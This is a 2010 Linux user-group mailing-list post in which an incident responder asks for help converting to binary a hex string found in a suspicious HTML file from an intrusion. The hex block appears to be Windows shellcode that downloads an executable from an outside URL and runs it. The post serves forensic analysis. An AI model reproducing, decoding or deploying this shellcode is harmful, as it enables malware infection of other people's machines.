[ale] Need a simple perl (etc.) program, but I don't speak perl

Greg Freemyer greg.freemyer at gmail.com
Thu Jun 3 10:58:05 EDT 2010


All,

I'm looking at an intrusion and found the attached very suspicious
html file (I added a .bin extent so it would not be associated with a
browser etc.

Anyway, within it there is a string  (see below) that I think is the
hex expression (see below) of malware that I need converted to binary.
 Can someone help me out with a perl script to convert.  Or even
better, convert it to binary and seal it up in a password protected
zip file.  Use "infected" as the password.  Thanks, Greg

== Potential malware representation

505351525657559CE8000000005D83ED0D31C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C5657BE5E01000001EEBF4E01000001EFE8D60100005F5E89EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356302000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C278020000526A00FFD06A0589EA81C25E01000052FF955A01000089EA81C25E010000526880000000FF954E01000089EA81C25E01000031F601C28A9C356E02000080FB007406881C3246EBEEC604320089EA81C24502000052FF955201000089EA81C2500200005250FF95560100006A006A0089EA81C25E0100005289EA81C2A6020000526A00FFD06A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C30000000000000000000000000000000047657454656D705061746841004C6F61644C696272617279410047657450726F63416464726573730057696E4578656300BB89F289F730C0AE75FD29F789F931C0BE3C00000003B51B02000066AD03851B0200008B707883C61C03B51B0200008DBD1F020000AD03851B020000ABAD03851B02000050ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF3A65974045E43EBE95E93D1E003852702000031F69666ADC1E00203851F02000089C6AD03851B020000C3EB100000000000000000000000000000000089851B0200005657E858FFFFFF5F5EAB01CE803EBB7402EBEDC355524C4D4F4E2E444C4C0055524C446F776E6C6F6164546F46696C6541007064667570642E6578650063726173682E70687000687474703A2F2F767676656E2E696E2F782F6578652E7068703F783D6D696469267372633D626F73732669643D626F6D62610090

==
-------------- next part --------------
A non-text attachment was scrubbed...
Name: CF-03763.html.bin
Type: application/octet-stream
Size: 2070 bytes
Desc: not available
Url : http://mail.ale.org/pipermail/ale/attachments/20100603/746a86bf/attachment.bin 


More information about the Ale mailing list